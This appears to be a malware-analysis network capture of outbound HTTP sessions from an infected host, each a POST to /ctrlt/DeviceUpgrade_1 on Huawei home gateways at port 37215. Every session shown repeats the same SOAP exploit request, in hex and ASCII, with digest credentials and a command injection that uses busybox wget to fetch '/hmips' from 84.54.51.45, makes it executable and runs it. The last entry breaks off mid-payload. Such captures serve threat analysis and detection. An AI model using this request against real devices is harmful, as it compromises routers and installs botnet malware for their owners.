                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1834192.168.2.155953441.105.134.1637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465976954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1835192.168.2.153558641.54.57.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466015100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1836192.168.2.155531041.122.115.20937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466034889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1837192.168.2.155047241.64.26.2237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466058016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1838192.168.2.154752041.22.188.21037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466065884 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1839192.168.2.154471041.49.93.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466073036 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1840192.168.2.154279641.217.141.1937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466157913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1841192.168.2.156033241.42.222.7537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466171026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1842192.168.2.154364641.69.198.7637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466171026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1843192.168.2.153947241.185.15.24537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466180086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 